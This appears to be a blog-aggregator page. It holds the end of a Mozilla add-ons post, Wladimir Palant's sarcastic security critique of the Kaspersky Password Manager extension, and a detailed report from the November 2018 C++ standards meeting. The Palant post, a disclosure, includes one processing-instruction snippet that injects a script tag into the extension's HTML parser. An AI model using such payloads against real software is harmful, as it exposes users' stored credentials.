“I don’t think I’ve ever reviewed an extension, but man, what a find. I get very sick of closing overlays and finding the little ‘x’ in some corner of it or some light colored ‘close’ link. They get sneakier and sneakier about making you actually read the overlay to find a way to close it. Now when I see one, I know right away I can click on the X in the toolbar and it will disappear. So satisfying.”

If you’d like to nominate an extension for featuring, please send it to amo-featured [at] mozilla [dot] org for the board’s consideration. We welcome you to submit your own add-on!

The post December’s Featured Extensions appeared first on Mozilla Add-ons Blog.

Wladimir PalantMaximizing password manager attack surface: Learning from Kaspersky

I looked at a number of password manager browser extensions already, and most of them have some obvious issues. Kaspersky Password Manager manages to stand out in the crowd however, the approach taken here is rather unique. You know how browser extensions are rather tough to exploit, with all that sandboxed JavaScript and restrictive default content security policy? Clearly, all that is meant for weaklings who don’t know how to write secure code, not the pros working at Kaspersky.

Kaspersky developers don't like JavaScript, so they hand over control to their beloved C++ code as soon as possible. No stupid sandboxing, code is running with the privileges of the logged in user. No memory safety, dealing with buffer overflows is up to the developers. How did they manage to do it? Browser extensions have that escape hatch called native messaging which allows connecting to an executable running on the user's system. And that executable is what contains most of the logic in the case of the Kaspersky Password Manager, with the browser extension being merely a dumb shell.

The extension uses website events to communicate with itself. As in: code running in the same scope (content script) uses events instead of direct calls. While seemingly pointless, this approach has a crucial advantage: it allows websites to mess with the communication and essentially make calls into the password manager’s executable. Because, if this communication channel weren’t open to websites, how could the developers possibly prove that they are capable of securing their application?

Now I’m pretty bad at reverse engineering binary code. But I managed to identify large chunks of custom-written code that can be triggered by websites more or less directly:

  • JSON parser
  • HTML parser
  • Neural network

While the JSON parser is required by the native messaging protocol, you are probably wondering what the other two chunks are doing in the executable. After all, the browser already has a perfectly capable HTML parser. But why rely on it? Analyzing page structure to recognize login forms would have been too easy in the browser. Instead, the browser extension serializes the page back to HTML (with some additional attributes, e.g. to point out whether a particular field is visible) and sends it to the executable. The executable parses it, makes the neural network analyze the result and tells the extension which fields need to be filled with what values.

Doesn’t sound like proper attack surface maximization because serialized HTML code will always be well-formed? No problem, the HTML parser has its limitations. For example, it doesn’t know XML processing instructions and will treat them like regular tags. And document.createProcessingInstruction("foo", "><script/src=x>") is serialized as <?foo ><script/src=x>?>, so now the HTML parser will be processing HTML code that is no longer well-formed.

This was your quick overview, hope you learned a thing or two about maximizing the attack surface. Of course, you should only do that if you are a real pro and aren’t afraid of hardening your application against attacks!

Botond BalloTrip Report: C++ Standards Meeting in San Diego, November 2018

Summary / TL;DR

Project | What’s in it? | Status
C++17 | See list | Published!
C++20 | See below | On track
Library Fundamentals TS v3 | See below | Under active development
Concepts TS | Constrained templates | Merged into C++20, including (now) abbreviated function templates!
Parallelism TS v2 | Task blocks, library vector types and algorithms, and more | Published!
Executors | Abstraction for where/how code runs in a concurrent context | Subset headed for C++20, rest in C++23
Concurrency TS v2 | See below | Under development. Depends on Executors.
Networking TS | Sockets library based on Boost.ASIO | Published! Not headed for C++20.
Ranges TS | Range-based algorithms and views | Merged into C++20!
Coroutines TS | Resumable functions, based on Microsoft’s await design | Published! C++20 merge uncertain
Modules v1 | A component system to supersede the textual header file inclusion model | Published as a TS
Modules v2 | Improvements to Modules v1, including a better transition path | On track to be merged into C++20
Numerics TS | Various numerical facilities | Under active development
Graphics TS | 2D drawing API | Future uncertain
Reflection TS | Static code reflection mechanisms | PDTS ballot underway; publication expected in early 2019

A few links in this blog post may not resolve until the committee’s post-meeting mailing is published (expected any day now). If you encounter such a link, please check back in a few days.

Introduction

A few weeks ago I attended a meeting of the ISO C++ Standards Committee (also known as WG21) in San Diego, California. This was the third committee meeting in 2018; you can find my reports on preceding meetings here (June 2018, Rapperswil) and here (March 2018, Jacksonville), and earlier ones linked from those. These reports, particularly the Rapperswil one, provide useful context for this post.

This meeting broke records (by a significant margin) for both attendance (~180 people) and number of proposals submitted (~270). I think several factors contributed to this. First, the meeting was in California, for the first time in the five years that I’ve been attending meetings, thus making it easier to attend for Bay Area techies who weren’t up for farther travels. Second, we are at the phase of the C++20 cycle where the door is closing for new proposals targeting C++20, so for people wanting to get features into C++20, it was now or never. Finally, there has been a general trend of growing interest in participation in C++ standardization, and thus attendance has been rising even independently of other factors.

This meeting was heavily focused on C++20. As discussed in the committee’s standardization schedule document, this was the last meeting to hear new proposals targeting C++20, and the last meeting for language features with significant library impact to gain design approval. A secondary focus was on in-flight Technical Specifications, such as Library Fundamentals v3.

To accommodate the unprecedented volume of new proposals, there has also been a procedural change at this meeting. Two new subgroups were formed: Evolution Incubator (“EWGI”) and Library Evolution Incubator (“LEWGI”), which would look at new proposals for language and library changes (respectively) before forwarding them to the Evolution or Library Evolution Working Groups (EWG and LEWG). The main purpose of the incubators is to reduce the workload on the main Evolution groups by pre-filtering proposals that need additional work before being productively reviewed by those groups. A secondary benefit was to allow the attendees to be spread out across more groups, as otherwise EWG and LEWG would have likely exceeded their room capacities.

C++20

Here are the new changes voted into the C++20 Working Draft at this meeting. For a list of changes voted in at previous meetings, see my Rapperswil report.

Technical Specifications

In addition to the C++ International Standard (IS), the committee publishes Technical Specifications (TS) which can be thought of as experimental “feature branches”, where provisional specifications for new language or library features are published and the C++ community is invited to try them out and provide feedback before final standardization.

At this meeting, the committee iterated on a number of TSes under development.

Reflection TS

The Reflection TS was sent out for its PDTS ballot at the last meeting. As described in previous reports, this is a process where a draft specification is circulated to national standards bodies, who have an opportunity to provide feedback on it. The committee can then make revisions based on the feedback, prior to final publication.

The PDTS ballot is still ongoing, so there wasn’t much to do on this front at this meeting. We expect the ballot results to be ready by the next meeting (February 2019, in Kona), at which time we’ll address the ballot comments and, time permitting, approve the revised TS for publication.

One minor snafu discovered at this meeting is that prior to the PDTS ballot, the Reflection TS, which depends on Concepts, has been rebased onto C++20, to take advantage of C++20 Concepts (previously, it was based on the Concepts TS). Unfortunately, ISO rules don’t allow publishing a TS before its base document is published, which means that to publish the Reflection TS as-is, we’d have to wait to do it concurrently with the C++20 publication in late 2020. We very much don’t want to wait that long, since the purpose of the Reflection TS is to gather feedback from users in preparation for revised Reflection features in C++23, and the earlier we start getting that feedback, the better. So, we’ll have to un-rebase the Reflection TS onto {C++17 + Concepts TS} to be able to publish it in early 2019 as planned. Isn’t red tape fun?

Library Fundamentals TS v3

This third iteration (v3) of the Library Fundamentals TS is open for new features to be added. (The TS working draft currently contains features from v2 which haven’t been merged into the C++ IS yet.) The only changes voted in at this meeting were a rebase and some issue resolutions, but a number of new features are on the way.

Executors

As discussed below, the revised plans for Executors are for a subset of them to target C++20, and the rest C++23. An Executors TS is not planned at this time.

Merging Technical Specifications into C++20

Turning now to Technical Specifications that have already been published, but not yet merged into the IS, the C++ community is eager to see some of these merge into C++20, thereby officially standardizing the features they contain.

Ranges TS

The Ranges TS modernizes and Conceptifies significant parts of the standard library (the parts related to algorithms and iterators), as well as introducing exciting new features such as range views.

After years of hard work developing these features and going through the TS process, the Ranges TS was finally merged into C++20, paving the way for wider adoption of these features.
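
For readers who haven't tried the TS yet, here is a minimal sketch of the style of code the merge enables (the vector and the filter predicate are purely illustrative; implementations were still catching up to the working draft at the time):

    #include <algorithm>
    #include <iostream>
    #include <ranges>
    #include <vector>

    int main() {
        std::vector<int> v{4, 1, 3, 2};
        std::ranges::sort(v);  // constrained, range-taking algorithm from the merge

        // Lazy, composable views are the other headline feature.
        for (int n : v | std::views::filter([](int x) { return x % 2 == 0; }))
            std::cout << n << ' ';
    }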

Concepts TS

The approval of abbreviated function templates for C++20 at this meeting can be thought of as completing the merge of the Concepts TS into C++20: all the major features in the TS have now been merged, with some design modifications inspired by implementer and user feedback.

While the journey took longer than was initially hoped, in my opinion Concepts is a better feature for the design changes made relative to the Concepts TS, and as such this is an example of the TS process working as intended.

Modules TS

Modules remains one of the most highly anticipated features by the C++ user community. This meeting saw really good progress on Modules: a “merged” Modules design, combining aspects of the Modules TS and the alternative Atom proposal, gained design approval for C++20.

This outcome exceeded expectations in that previously, the merged proposal seemed more likely to target a Modules TS v2 or C++23, with a subset possibly targeting C++20; however, thanks in significant part to the special one-off Modules-focused Bellevue meeting in September, good enough progress was made on the merged design that the authors were comfortable proposing putting the entire thing into C++20, which EWG subsequently approved.

As this is a large proposal, wording review by the Core Working Group will take some time, and as such, a plenary vote to merge the reviewed wording into the C++20 working draft won’t take place until the next meeting or the one after; however, as all the major compiler implementers seem to be on board with this design, and there is overwhelming demand for the feature from the user community, I expect smooth sailing for that vote.

In fewer words: Modules is on track for C++20!

Coroutines TS

The Coroutines TS was once again proposed for merger into C++20 at this meeting. This is the third time this proposal was made (the other two times being at the previous two meetings). At the last meeting, the proposal got as far as a plenary vote at the end of the week, which narrowly failed.

The opposition to merging the TS into C++20 comes from the fact that a number of people have concerns about the Coroutines TS design (some of them are summarized in this paper), and an alternative proposal that addresses these concerns (called “Core Coroutines”) is under active development. Unfortunately, Core Coroutines is not sufficiently-baked to make C++20, so going with it would mean delaying Coroutines until C++23. Opinions differ on whether this is a worthwhile tradeoff: the Core Coroutines authors are of the view that C++ will remain a relevant language for 50 years or more, and waiting 3 years to improve a feature’s design is worthwhile; others have made it clear that they want Coroutines yesterday.

After the failure of last meeting’s merger proposal, it was hoped that waiting one more meeting would allow for the Core Coroutines proposal to mature a bit. While we knew it wouldn’t be ready for C++20, we figured the added maturity would allow us to better understand what we would be giving up by merging the Coroutines TS into C++20, and possibly identify changes we could make to the Coroutines TS before C++20’s publication that would make incremental improvements inspired by Core Coroutines backwards-compatible, thereby allowing us to make a more informed decision on the C++20 merger.

Core Coroutines did make significant progress since the last meeting: the updated proposal is simpler, more fleshed out, and has a cleaner syntax. The impasse has also inspired efforts, led by Facebook, to combine the two proposals in such a way that would unblock the merger into C++20, and allow for backwards-compatible improvements achieving many of the goals of Core Coroutines in C++23, but these efforts are at a relatively early stage (a paper describing the combined design in detail was circulated for the first time while the meeting was underway).

Ultimately, waiting a meeting doesn’t seem to have changed many people’s minds, and we saw a replay of what happened in Rapperswil: EWG narrowly passed the merger, and plenary narrowly rejected it; interestingly, the level of consensus in plenary appears to have decreased slightly since Rapperswil.

To keep C++20 on schedule, the final deadline for approving a TS merger is the next meeting, at Kona. The merger will undoubtedly be re-proposed then, and there remains some optimism that further development of Facebook’s combined proposal might allow us to gain the required confidence in a future evolution path to approve the merger for C++20; otherwise, we’re looking at getting Coroutines in C++23.

Networking TS

It’s looking like the Networking TS will not be merged into C++20, in large part due to the concerns presented in this paper discussing usage experience. The TS will instead target C++23.

Evolution Working Group

With the increased number of subgroups meeting in parallel, it’s becoming more challenging to follow what goes on in the committee.

I usually sit in EWG for the duration of the meeting, and summarize the design discussions that take place in that group. I will try to do so again, but I did miss some EWG time while sitting in some study group meetings and Evolution Incubator meetings, so expect some reduction in the amount of detail. If you have specific questions that I didn’t cover, feel free to ask in the comments.

This time, I’ll categorize proposals by topic. For your convenience, I still indicate whether each proposal was approved, had further work on it encouraged, or rejected. Proposals are targeting C++20 unless otherwise mentioned.

Concepts

The headline item here is the approval of the compromise design for abbreviated function templates (AFTs). With this syntax, AFTs look like this:

void f(Concept auto x);

This makes both the “I want to write a function template without the template<...> notation” and the “I want to be able to tell syntactically if a function is a template” camps happy (the latter because the auto tells you the parameter has a deduced type, and therefore the function is a template).

You can also use Concept auto as a return type, and as the type of a variable. In each case, the type is deduced, and the deduced type has to satisfy the concept. The paper as written would have allowed the return type and variable cases to omit the auto, but this didn’t have consensus and was removed.

Note that you can write just void f(auto x); as well, making functions consistent with lambdas which could already do this.

Finally, as part of this change, a restriction was imposed on the template <Concept T> notation, that T has to be a type. For non-type and template template parameters, constraints can only be specified using a requires-clause. The motivation here is to be able to tell syntactically what type of entity T is.
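
Putting the pieces above together, here is a minimal sketch of the approved syntax, using std::integral from the standard concepts library purely as an example concept (the function and variable names are invented):

    #include <concepts>

    // An abbreviated function template: the constrained 'auto' parameter makes
    // twice() a template, and the auto makes the "templateness" visible at a glance.
    std::integral auto twice(std::integral auto x) {
        return x + x;                     // deduced return type must satisfy std::integral
    }

    void log_value(auto x) {}             // unconstrained AFT, consistent with generic lambdas

    int main() {
        std::integral auto answer = twice(21);  // constrained placeholder on a variable
        log_value(answer);
        return answer == 42 ? 0 : 1;
    }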

A few other Concepts-related proposals were looked at:

  • (Further work) How to make terse notation soar with class template argument deduction. The idea here is to combine class template argument deduction (CTAD) and Concepts such that a class template name (e.g. tuple) can be used as a parameter type as if it were a concept (with the concept being, roughly, “this type is a specialization of tuple“). The proposal was generally well-received, but there are some technical details to iron out, and design alternatives to consider (e.g. spelling it tuple<auto...>), so this will be revisited for C++23.
  • (Rejected) A simple proposal for unifying generic and object-oriented programming. This is a more ambitious proposal to try to allow writing code that works with a set of polymorphic types, that looks the same regardless of whether the polymorphism is dynamic (inheritance) or static (concepts). Reception was mixed; some felt this would introduce a new programming model with relatively little benefit.
  • (Rejected) Concept-defined placeholder types. This would have allowed defining a “placeholder type” constrained by a concept, and using that type in place of the concept. It didn’t really fit with the AFT design that was approved.
  • (Rejected) Multi-argument constrained parameter. This proposed a whitespace-based syntax for introducing multiple constrained parameters in a template parameter list, e.g. template <EqualityComparableWith T U>. EWG didn’t feel the whitespace syntax was an improvement over other syntaxes that have been rejected, like template <EqualityComparableWith{T, U}>.

EWG ran out of time to review the updated “constraining Concepts overload sets” proposal. However, there was some informal speculation that the chances of this proposal making C++20 have diminished, because the proposal has grown a lot more complex in an attempt to address EWG’s feedback on the previous version, which suggests that feedback had touched on some hard problems that we may not be in a good position to solve at this time.

Modules

As mentioned, perhaps the biggest high-point of this meeting was EWG’s approval of the merged Modules design for C++20. “Merged” here refers to the proposal combining aspects of the Modules TS design, and the alternative Atom proposal. Perhaps most significantly, the design borrows the Atom proposal’s legacy header imports feature, which is intended to better facilitate incremental transition of existing large codebases to Modules.
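
As a rough illustration of the merged design (the file and module names are made up, and compiler and build-system support was still experimental when this was written), a single-file module that also uses a legacy header import might look something like this:

    // math.cppm: a module interface unit (file extension is a common convention, not mandated)
    export module math;

    import <vector>;   // legacy header import ("header unit"), borrowed from
                       // the Atom proposal to ease migration of existing code

    export int sum(const std::vector<int>& values) {
        int total = 0;
        for (int v : values) total += v;
        return total;
    }

A consumer would then write import math; rather than including a header.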

Several minor modifications to this design and related changes were also proposed:

  • (Approved) Making module a context-sensitive keyword, take two. Following consistent feedback from many segments of the user community that making module a hard keyword would break too much code, a new proposal for making it context-sensitive, this time with simpler disambiguation rules, was approved.
  • (Approved) Single-file modules with the Atom semantic properties rule. This allows module authors to do certain things that previously required separate module partitions in separate files, in one file.
  • (Approved) Module preamble is unnecessarily fragile. This tweaks the rules for where a module file’s “preamble” (the area containing the module declaration and imports) ends, with a view to making the user model simpler.
  • (Approved) Redefinitions in legacy imports. This clarifies some of the rules in scenarios involving legacy header imports.
  • (Further work) Modules and freestanding. This mostly has to do with how to split the standard library into modules, with the relevance to EWG being that we should have a consistent approach for dealing with freestanding implementations in the language and in the library. EWG did not reach a consensus on this topic, mostly because there are a wide variety of freestanding environments with different constraints, and a single subset of the language does not fit all of them.
  • (Further work) Inline module partitions. This is a generalization of “Single-file modules with the Atom semantic properties rule”, which would allow defining an arbitrary number of module partitions “inline” in a single file. EWG encouraged further development of this idea, but for post-C++20.
  • (Rejected) Global module fragment is unnecessary. The global module fragment is one of two mechanisms for transitioning existing code to Modules (the other being legacy header imports). The author of this paper suggested that just legacy header imports may be sufficient, but this was emphatically argued against based on implementation experience at some companies, leading to the proposal’s rejection.
  • (Rejected) Retiring pernicious language constructs in module contexts. This paper suggested that Modules was an opportunity to shed some of the language’s legacy cruft by making certain constructs invalid inside a module (while they would remain valid in non-modular code for backwards compatibility). There wasn’t much enthusiasm for this idea, largely because it’s expected that people will want to be able to freely copy / migrate code from a non-modular context to a modular context and vice versa.

Contracts

  • (Approved) Access control in contract conditions. This was the subject of a very long and drawn-out debate on the committee mailing lists which I won’t attempt to summarize, but the outcome was that pre- and post-conditions on member functions can reference private and protected variables inside the class, even though we think of them as being part of the class’s public interface.
  • (Approved) Contract postconditions and return type deduction. This is a tweak regarding the interaction between postconditions and return type deduction, with the intention to avoid surprising behaviour. Option 3 from the paper had consensus.
  • (Further work) Allowing contract predicates on non-first declarations. EWG was open to this idea, but some implementation issues (such as who emits the code for the contract check) need to be ironed out.
  • (Further work) Undefined behaviour in contract violations. This was another topic that engendered very extensive mailing list discussion. No decision was made this week, but the likely direction is to specify that contracts (except perhaps axioms) do not allow compilers to assume additional things they couldn’t already assume.
  • (Rejected) Contracts updates. Of the three minor changes proposed in this paper, the first was a trivial wording change (which was approved); the second had no consensus; and the third was deemed unimplementable.

constexpr

Continuing with the committee’s concerted effort to make clunkier forms of compile-time programming (such as template metaprogramming) unnecessary, EWG approved further extensions to constexpr:

Coroutines

I mentioned above that EWG narrowly passed the latest version of a proposal to merge the Coroutines TS into C++20, only to have it rejected in a plenary vote.

The technical discussion of this topic centred around an updated version of the competing Core Coroutines proposal, and a paper by Facebook engineers arguing that most of the benefits of Core Coroutines could be achieved through extensions to the Coroutines TS, and we should therefore go ahead with the Coroutines TS in C++20.

An interesting development that emerged mid-meeting is the Facebook folks coming up with a “unified coroutines” proposal that aims to achieve consensus by combining aspects of the two competing proposals. There wasn’t really enough time for the committee to digest this proposal, but we are all hopeful it will help us make an informed final decision (final for C++20, that is) at the next meeting.

Structured Bindings

  • (Approved in part) Extend structured bindings to be more like variable declarations. Structured bindings can now be static, thread_local, or constexpr; in each case, this applies to the entire composite object being destructured. Rules around linkage were also clarified. Capture of bindings by a lambda was deferred for further work. (A minimal sketch follows this list.)
  • (Further work) Simplify the customization point for structured bindings. EWG wholeheartedly wants an overhaul of the customization point (the current one just piggybacks on the customization point for tuple-like that we already had in the language), but felt this proposal addressed just one piece of what is a larger puzzle. A more complete proposal may look something like the operator extract from an earlier pattern matching proposal.
  • (Rejected) Structured bindings with explicit types. This was rejected because the use cases will be addressed more comprehensively with pattern matching.
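
A minimal sketch of the storage-class part of this change (the config() function and the binding names are invented for illustration):

    #include <utility>

    std::pair<int, int> config() { return {80, 443}; }

    int total_ports() {
        // C++20 allows a storage-class specifier on a structured binding;
        // 'static' applies to the whole destructured object, so both names
        // refer into a single object with static storage duration.
        static auto [http_port, https_port] = config();
        return http_port + https_port;
    }

    int main() { return total_ports() == 523 ? 0 : 1; }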

Class Template Argument Deduction (CTAD)

  • (Approved in part) Filling holes in class template argument deduction. CTAD now works with aggregates, alias templates, and inheriting constructors. Making CTAD work with partial template argument lists was rejected because it would be a breaking change in some cases (e.g. consider vector<any>(MyAlloc())). (A minimal sketch of the newly supported cases follows this list.)
  • (Rejected) Improving function templates with CTAD. EWG found that this would involve a lot of complexity, since with function templates you don’t just have one template definition as with class templates, but a whole overload set.
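
A minimal sketch of the newly supported cases (the Box aggregate and the Pile alias are made-up examples):

    #include <vector>

    template <typename T>
    struct Box {            // an aggregate: no user-declared constructors
        T value;
        int count;
    };

    template <typename T>
    using Pile = std::vector<T>;

    int main() {
        Box b{3.14, 2};     // CTAD for aggregates: deduces Box<double>
        Pile p{1, 2, 3};    // CTAD through an alias template: deduces std::vector<int>
        (void)b; (void)p;
    }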

Comparisons

Most comparison-related proposals involved early adopters trying out the spaceship operator (<=>) and discovering problems with it.

  • (Approved) I did not order this! Why is it on my bill?, which probably deserves a medal of some sort for most creative paper title. (Explanation: the paper concerns scenarios where you don’t care about ordering your type, only equality-comparing it, you implement a defaulted operator<=> (because that’s “the C++20 way” for all comparison use cases), and you pay a performance penalty that wouldn’t be there with hand-written code to deal with equality comparison only.) A related paper offers a solution, which is along the lines of making == be its own thing and not fall back to using <=>, since that’s where the inefficiency stems from (for types like string, if the lengths are different you can answer “not equal” much faster than if you’d have to answer “less” or “greater than”). A second part of the proposal, where a defaulted <=> would also generate a defaulted ==, so that users can be largely oblivious to this problem and just default one operator (<=>), was more controversial, but was still approved over some objections. (A minimal sketch of the resulting user model follows this list.)
  • (Approved) When do you actually use <=>? The crux of this paper is that we’ve had to invent a library function compare_3way() wrapping <=> and that’s what we want to use most of the time, so we should just give <=> the semantics of that function.
  • (Mooted) weak_equality considered harmful. This proposal has become moot as implementations of == are no longer generated in terms of <=>. (As a result, weak_equality and strong_equality are no longer used and will likely be removed in the future.)
  • (Rejected) Chaining comparisons. Despite previous encouragement, this was now rejected due to concerns about teachability and implementation issues.
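
A minimal sketch of the resulting user model (the Release type is invented for illustration): defaulting the one operator now yields the relational operators plus a separately generated, potentially faster ==:

    #include <cassert>
    #include <compare>
    #include <string>

    struct Release {
        int gen;
        int rev;
        std::string tag;

        // A single defaulted <=> provides <, <=, > and >=; under the change
        // approved here it also implies a defaulted ==, so equality never has
        // to compute an ordering (strings of different lengths, for example,
        // can report "not equal" immediately).
        auto operator<=>(const Release&) const = default;
    };

    int main() {
        assert((Release{1, 2, "beta"} < Release{1, 3, "beta"}));
        assert((Release{1, 2, "beta"} == Release{1, 2, "beta"}));
    }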

Other New Features

  • (Further work) Deducing this. This proposal allows writing member functions where the type of this is deduced, thereby eliminating the need to duplicate implementations for things like const vs. non-const objects, and other sources of pain. There was a fair amount of technical discussion concerning recursive lambdas (which this proposal hopes to enable), name lookup rules, and other semantic details. The authors will return with a revised proposal.
  • (Rejected) Towards a lazy forwarding mechanism for C++. This would allow declaring function parameters to be “lazy”, such that their arguments are evaluated upon their use inside the function (and possibly not at all if there is no use), rather than at the call site; participants pointed out a similarity to Algol’s “call by name” feature. EWG wasn’t categorically opposed to the notion of lazy parameters, but the notion of having them without any call-site syntax (like this paper proposes) was controversial.

Bug / Consistency Fixes

(Disclaimer: don’t read too much into the categorization here. One person’s bug fix is another’s feature.)

  • (Approved) Allow initializing aggregates from a parenthesized list of values. This finally allows things like vector::emplace_back() to work for aggregates. (A minimal sketch follows this list.)
  • (Approved) Contra CWG DR1778. This has to do with noexcept and explicitly defaulted functions. The first option from the paper was approved.
  • (Approved) Permit conversions to arrays of unknown bound. The motivation cited for this is working in environments where dynamic allocation is not allowed and use of pointers is restricted, and thus passing around variable-length arrays as arrays of unknown bound is the only way to work with dynamically sized data ranges.
  • (Approved) Array size deduction in new-expressions. This is a minor consistency fix that was also approved as a Defect Report against older language versions.
  • (Approved) Nested inline namespaces. This allows using the C++17 nested namespace syntax in cases where one or more of the namespaces are inline. Example: namespace foo::inline bar::baz { } is short for namespace foo { inline namespace bar { namespace baz { }}}. inline is not allowed in the leading position as people might mistakenly think it applies to the innermost namespace.
  • (Further work) Conditionally trivial special member functions. This is a small but important fix for library implementers who would otherwise have to use labour-intensive techniques to meet the triviality requirements set out for standard library types. This was essentially approved, but specification difficulties necessitate one more round of review.
  • (Further work) Ultimate copy elision. This aims to expand the set of scenarios in which the compiler is allowed to elide copies and moves (note: unlike the C++17 “guaranteed copy elision” feature, this is not requiring compilers to elide copies in these new scenarios, just allowing them). EWG liked the general idea but had concerns about the potential for code breakage in some scenarios.
  • (Further work) Adding the [[constinit]] attribute. The motivation here is cases where you want to guarantee that a variable’s initial value is computed at compile time (so no dynamic initialization required), without making the variable const (so that you can assign new values to it at runtime). EWG liked the idea but preferred using a keyword rather than an attribute. An alternative to decorate the initializer rather than the variable had no consensus.
  • (Postponed) short float. This proposal continues to face challenges due to concerns about different implementations using different sizes for it, or even different representations within the same size (number of bits in mantissa vs. exponent). As a result, there was no consensus for moving forward with it for C++20. There remains strong interest in the topic, so I expect it will come back for C++23, possibly under a different name (such as float16_t instead of short float, to specify the size more concretely).
  • (Rejected) Deprecate the addressof operator. This proposes to deprecate the overloading of operator &. EWG didn’t feel that removal was realistic given that we don’t have a good handle on the breadth of usage in the wild, and didn’t want to entertain deprecation without an intention to remove as a follow-up.
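
A minimal sketch of the emplace_back case called out above (Point is a made-up aggregate):

    #include <vector>

    struct Point { int x; int y; };   // an aggregate: no user-declared constructors

    int main() {
        std::vector<Point> pts;
        // emplace_back forwards its arguments to Point(1, 2); before this change
        // that failed because aggregates have no such constructor, but aggregates
        // can now be initialized from a parenthesized list of values.
        pts.emplace_back(1, 2);
    }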

Evolution Working Group Incubator

As mentioned above, due to the increased quantity of proposals, an “EWG Incubator” group (EWGI) was also spun up to do a preliminary round of review on some proposals that EWG couldn’t get to this week, in the hope of making them better-baked for their eventual EWG review at a future meeting.

I only attended EWGI for half a day, so I don’t have much to report about the discussions that went on, but I will list the papers the group forwarded to EWG:

There were also a couple of papers EWGI referred for EWG review not necessarily because they’re sufficiently baked, but because they would benefit from evaluation by a larger group:

Numerous other proposals were asked to return to EWGI with revisions. I’ll call out a couple:

  • There were two proposals for pattern matching. The feature had strong support, and the authors were asked to return with a combined proposal.
  • There was another attempt at named arguments (called “labelled parameters” in the proposal). The novelty in this approach was putting the names in the type system, but without actually modifying any semantic rules like overload resolution, by encoding the labels using existing mechanisms in the type system, and then layering a “sugar” syntax on top. EWGI’s feedback was that the attempted abstraction will leak, and we’ll have to end up making deeper modifications to the type system after all, to have a usable feature. Encouragement to return was weak but existent.

Papers not discussed

There were, of course, also papers that neither EWG nor EWGI had the time to look at during this meeting; among them was Herb’s static exceptions proposal, which is widely anticipated, but not targeting C++20.

I’ll also briefly mention the lifetimebound proposal which Mozillians have expressed a particular interest in due to the increased lifetime safety it would bring: the authors feel that Microsoft’s lifetime checker, whose model of operation is now described in a paper, is doing an adequate job of satisfying this use case outside of the core language rules (via annotations + a separate static checker). Microsoft’s lifetime checker ships with MSVC, and has a work-in-progress implementation in Clang as well, which can be tried out in Compiler Explorer, and will hopefully be open-sourced soon. See also Roc’s blog post on this subject.

Other Working Groups

Library Groups

Having sat in the Evolution groups, I haven’t been able to follow the Library groups in any amount of detail, but I’ll call out some of the more notable library proposals that have gained design approval at this meeting:

And a few notable proposals which are still undergoing design review, and are being treated with priority:

There are numerous other proposals in both categories above; I’m just calling out a few that seem particularly noteworthy. Please see the committee’s website for a full list of proposals.

Study Groups

SG 1 (Concurrency)

Most of the C++20-track work (jthread, Executors subset, synchronization omnibus paper, memory model fixes) has progressed out of the Concurrency Study Group and is mentioned above.

For Executors, the current plan is to put a subset of the unified proposal (specifically including “one way” and “bulk one way” executors, but not the other kinds) into C++20, and the rest into C++23; a TS is not planned at this time.

Coroutines-related library additions are not being reviewed yet; they need more bake time, and integration with the next revision of Executors.

SG 1 has opinions on freestanding implementations: they feel omitting thread_local from a freestanding implementation is fine, but omitting non-lock-free atomics or thread-safe statics is more controversial.

SG 7 (Compile-Time Programming)

There were two meetings related to compile-time programming this week. The first was an evening session where the committee re-affirmed its preference for constexpr-based metaprogramming as the future of C++ metaprogramming, in preference to template metaprogramming (TMP). (There was some confusion in this regard, as there was a proposal to standardize Boost.Mp11, a TMP library. The feeling at the end of the meeting was that with constexpr metaprogramming just around the corner, it’s probably not the best use of committee time to standardize a TMP library.)

The second was an afternoon meeting of SG 7, where the main agenda item was reviewing two proposals for reflection based on constexpr metaprogramming: constexpr reflexpr, and scalable reflection in C++. The first is by the authors of the Reflection TS, and tries to carry over the Reflection TS facilities to the land of constexpr in a relatively straightforward way. The second is a variation of this approach that reflects experience gained from experimentation by some implementers. Both proposals also go further than the Reflection TS in functionality, by supporting reification, which involves going from meta-objects obtained via reflection back to the entities they represent.

One notable difference between the two proposals is that the first uses meta-objects of different types to represent different kinds of entities (e.g. meta::variable, meta::function, etc.), whereas the second uses just one type (meta::info) for all meta-objects, and requires using operations on them (e.g. is_variable()) to discriminate. The authors of the second proposal claim this is necessary for compile-time performance to be manageable; however, from an interface point of view the group preferred the different-types approach, and some implementers thought the performance issues could be solved. At the same time, there was agreement that while there should be different types, they should not form an inheritance hierarchy, but rather be type-erased by-value wrappers. In addition, the group felt that errors should be visible in the type system; that is, rather than having meta-objects admit an invalid state, reflection operations that can fail should return something like expected<meta::info> instead.

The target ship vehicle for a constexpr-based reflection facility is not set in stone yet, but people are hopeful for C++23.

In addition, SG 7 approved some guidelines for what kinds of library proposals should require SG 7 review.

SG 13 (Human/Machine Interface)

The Human/Machine Interface Study Group (SG 13) deals with proposals for graphics, event handling, and other forms of user interaction.

Its main product so far has been the 2D graphics proposal, which had been making good progress until it lost consensus to move forward at the last meeting. As there was still significant interest in this proposal in many user communities (see e.g. this paper arguing strongly for it), the Convenor asked SG 13 to have another look at it, to see if consensus could somehow be re-attained. There wasn’t extensive technical discussion of the proposal at this meeting, but we did go over some feedback from potential implementers; it was suggested that the author and other interested parties spend some time talking to graphics experts, many of whom are found in the Bay area (though not the ones at Mozilla – our graphics folks are mostly in the Toronto office).

The group also discussed the web_view proposal, which was positioned as an alternative to rolling our own graphics API. As the proposal effectively involves shipping a web platform implementation as part of the C++ standard library, this proposal has a lot of relevance to Mozilla. As such, I solicited feedback on it on Mozilla’s platform mailing list, and the feedback was pretty universally that this is not a good fit for the C++ standard library. I relayed this feedback at this meeting; nonetheless, the group as a whole was in favour of continuing to pursue this proposal. In fact, the group felt this and 2D graphics serve different use cases and should both be pursued in parallel. (Admittedly, there’s some selection bias going on here: people who choose to attend a meeting of SG 13 are naturally likely to be in favour of proposals in this topic area. I’m curious to see how these proposals will fare in front of a larger voting audience.)

There was also some general discussion of other topics in scope for this group. There are plans to bring forward a proposal for an audio API, and there were also ideas thrown around about things like event handling, user input, sensors, and VR.

SG 15 (Tooling)

The Tooling Study Group (SG 15) met for an evening session, and numerous papers concerning a variety of topics were presented.

The most pressing topic was how to integrate Modules with build systems. The problem is nicely summarized in this paper, and proposed solutions range from a separate “module mapper” component to relying on conventions.

The other major topic was general discussion about where to go in the space of dependency and package management. Ideas presented here include a set of APIs to allow components of a package ecosystem to interface with each other without requiring a particular implementation for any one component, and ideas around package specification.

I don’t feel like a lot of decisions were made in this session, and the group as a whole seems to be conflicted about what its role is given that these areas are not in the purview of the C++ standards document itself, but I still think the evening served as a valuable opportunity for pioneers in these areas to exchange ideas and build mindshare around the tooling problems facing the C++ community.

Other Study Groups

